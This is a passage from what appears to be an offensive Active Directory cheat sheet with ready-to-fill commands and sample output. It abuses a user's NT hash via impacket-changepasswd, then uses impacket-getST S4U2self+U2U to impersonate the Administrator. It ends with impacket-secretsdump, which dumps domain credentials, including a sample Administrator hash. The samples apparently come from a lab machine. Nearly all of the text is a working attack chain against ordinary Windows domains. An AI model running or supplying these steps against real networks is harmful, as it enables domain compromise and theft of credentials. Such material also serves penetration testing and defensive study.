[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
# NTLM
impacket-changepasswd '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -dc-ip <DC_IP> -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd 'example.com/apple.seed@dc.example.com' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -newhashes :49e0cd8abe883d869f5af9ad8556fb29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\apple.seed
[*] Connecting to DCE/RPC as example.com\apple.seed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
# Password-based Kerberos
impacket-changepasswd '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k -dc-ip <DC_IP> -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd 'example.com/apple.seed:Password123!@dc.example.com' -k -dc-ip 10.10.11.10 -newhashes :49e0cd8abe883d869f5af9ad8556fb29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\apple.seed
[*] Connecting to DCE/RPC as example.com\apple.seed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
# NTLM-based Kerberos
impacket-changepasswd '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -k -dc-ip <DC_IP> -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd 'example.com/apple.seed@dc.example.com' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -newhashes :49e0cd8abe883d869f5af9ad8556fb29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\apple.seed
[*] Connecting to DCE/RPC as example.com\apple.seed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
# Ticket-based Kerberos
impacket-changepasswd '<DOMAIN>/<USER>@<TARGET>' -k -dc-ip <DC_IP> -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd 'example.com/apple.seed@dc.example.com' -k -dc-ip 10.10.11.10 -newhashes :49e0cd8abe883d869f5af9ad8556fb29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\apple.seed
[*] Connecting to DCE/RPC as example.com\apple.seed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
6. Get a Service Ticket
# Password
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER> -u2u
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/apple.seed:Password123!' -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator -u2u
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@example.com.ccache
# NTLM
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER> -u2u
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator -u2u
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@example.com.ccache
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER> -u2u
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/apple.seed:Password123!' -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator -u2u
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@example.com.ccache
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<USER>' -hashes :<HASH> -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER> -u2u
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator -u2u
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@example.com.ccache
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<USER>' -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER> -u2u
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/apple.seed' -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator -u2u
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@example.com.ccache
7. Secrets Dump
# Pass-the-ticket
export KRB5CCNAME='<CCACHE_2>'
Sample Output:
$ export KRB5CCNAME='Administrator@cifs_DC.example.com@PHANTOM.VL.ccache'
# Ticket-based Kerberos
impacket-secretsdump <TARGET_USER>@<TARGET> -k -no-pass
Sample Output:
$ impacket-secretsdump administrator@dc.example.com -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ddf32e17a6ac5ce04a8ecbf782ca509:::
---[SNIP]---
[*] Cleaning up...